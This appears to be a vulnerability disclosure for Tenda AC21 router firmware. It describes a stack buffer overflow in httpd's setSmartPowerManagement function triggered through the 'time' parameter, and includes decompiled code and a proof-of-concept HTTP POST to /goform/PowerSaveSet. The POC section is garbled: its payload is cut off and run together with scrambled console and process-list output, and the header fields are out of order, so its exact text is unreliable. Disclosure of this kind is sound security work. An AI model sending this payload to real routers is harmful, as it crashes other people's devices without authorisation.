



description

1. Vulnerability Details

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd , function setSmartPowerManagement

Attackers can cause this vulnerability via parameter time

```
nptr = (char *)websGetVar(a1, "powerSavingEn", "0");
s = (char *)websGetVar(a1, "time", "00:00-7:30");
v4 = websGetVar(a1, "powerSaveDelay", "1");
v3 = (char *)websGetVar(a1, "ledCloseType", "allClose");
if ( nptr && s && v4 && v3 )
{
    sscanf(s, "%[^:]:%[^-]-%[^:]:%s", v7, v8, v9, v10);// 1
    sprintf(v11, "%s:%s", (const char *)v7, (const char *)v8);
    sprintf(v12, "%s:%s", (const char *)v9, (const char *)v10);
    GetValue("sys.sched.led.closetype", v13);
```

the sscanf function read string from s, and pass to v10 which is on the stack without checking its length, so there is a buffer overflow vulnerability.

2. Recurring loopholes and POC

In order to reproduce the vulnerability, the following steps can be followed:

- 1. Boot the firmware by gemu-system or other ways (real machine)
- 2. Attack with the following POC attacks

POST /goform/PowerSaveSet HTTP/1.1 Host: 192.168.0.1

Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/system time.html?random=0.9241437684734013& Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Cookie: password=25d55ad283aa400af464c76d713c07adqtucvb Connection: close nptr=0&powerSaveDelay=0&ledCloseType=0&time=11:11-By sending this poc, we can make httpd reboot commit crm railed or not need write riash argv[0] = httpdhttpd Yes: ***** WeLoveLinux***** ***** Welcome to **** [httpd][debug]------httpd]isten ip = 192.168.0.1 port = 80 -----webs.c,158 webs: Listening for HTTP requests at address 192.168.0.1 ifname wlan0 autoch select channel now! [tenda_autochannel_offset][11026] channel_offset=1 ifname wlan0 ACS select channel:40 httpd发生了重启, 4102 root 0:00 dhcp wan1 -c /etc/wan1.ini -m 1 eth1 -h linux-e00f153b0fb4 -x /etc/dhcpc-wan-up1.sh -a Tenda 4189 root 0:00 dnrd --cache=2000:4000 -R /etc/dnrd -s 172.26.26.3 -s 219.146.1.66 4273 root 0:00 miniupnpd -f /etc/miniupnpd.config 4286 root 0:00 sntp -z 28800 -t 86400 4344 root 0:00 httpd 4309 LOOF 4189 root 0:00 dnrd --cache=2000:4000 -R /etc/dnrd -s 172.26.26.3 -s 219.146.1.66 4273 root 0:00 miniupnpd -f /etc/miniupnpd.config 0:00 [kworker/0:2] 4468 root 0:00 [kworker/0:0] 4643 root 4779 root 0:00 sntp -z 28800 -t 86400 4787 root 0:00 httpd 4800 root 0:00 ps

Content-Length: 1087